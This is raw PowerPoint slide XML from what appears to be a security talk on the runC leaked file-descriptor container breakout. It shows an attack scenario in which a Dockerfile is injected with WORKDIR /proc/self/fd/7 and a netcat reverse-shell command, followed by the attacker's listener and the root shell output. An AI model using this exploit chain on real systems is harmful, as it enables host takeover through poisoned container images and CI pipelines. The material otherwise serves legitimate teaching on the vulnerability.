    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13768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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>fds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> container breakout</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="44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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="A computer screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64164793-B6DA-E25B-C3BA-53198D83CE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296510" y="1456736"/>
            <a:ext cx="7772400" cy="4524823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915B8DF0-3A75-4101-E021-B85ED3F2FD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2617076" y="1761107"/>
            <a:ext cx="7462345" cy="45657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A">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E801EA-86FA-FDF2-00A4-87626409FEE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977462" y="6022428"/>
            <a:ext cx="4350935" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="1200"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1"/>
              <a:t>snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>/blog/leaky-vessels-container-vuln-deep-dive/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA" sz="1200"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3891697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243D-5BC9-6D23-697E-6FAC7A98BFDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attack Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B508382F-E01F-2E75-DD88-B01375F0938B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Part of a supply-chain attack, the attacker inject these lines in project’s Dockerfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>The attacker establish a reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA40E8B2-8C63-B29C-5FB9-87C4D17904A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0A740146-5C92-04FD-F793-9D8C3FA88CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEDDC6EE-EC7A-46CD-6D3F-E1323515EC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027386" y="2837673"/>
            <a:ext cx="11049000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WORKDIR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="1F1F1F"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> cd ../../../../../ &amp;&amp; id &amp;&amp; bash –c ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 192.168.108.41 4141 –e /bin/bash’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="1F1F1F"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2846EE-3A4D-33FD-EB23-CC7491B006C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027386" y="4466163"/>
            <a:ext cx="9167648" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tariq@beast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4141</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="1F1F1F"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Listening on 0.0.0.0 4141</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1551290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243D-5BC9-6D23-697E-6FAC7A98BFDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attack Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B508382F-E01F-2E75-DD88-B01375F0938B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>The victim (or the automated CI/CD pipeline) run the infected image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>The attacker will receive a connection backfrom the victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA40E8B2-8C63-B29C-5FB9-87C4D17904A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0A740146-5C92-04FD-F793-9D8C3FA88CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{682C35F9-EEF0-A4AE-2C2E-4E4289728194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="4017169"/>
            <a:ext cx="9167648" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tariq@beast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4141</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Listening on 0.0.0.0 4141</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Connection received on .... 43638</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root@8cebcd2898ef:# cd ../../../../../../ &amp;&amp; id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="1F1F1F"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0(root) gid=0(root) groups=0(root)</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root@8cebcd2898ef:../../../../../..# ls</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bin</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boot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="1F1F1F"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cdrom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="1F1F1F"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-SA" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC417611-72B0-3166-520C-55FCE951C7E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2491015"/>
            <a:ext cx="8329448" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tariq@Freak-ub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/ docker run --rm  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="1F1F1F"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nice_image</a:t>
            </a:r>
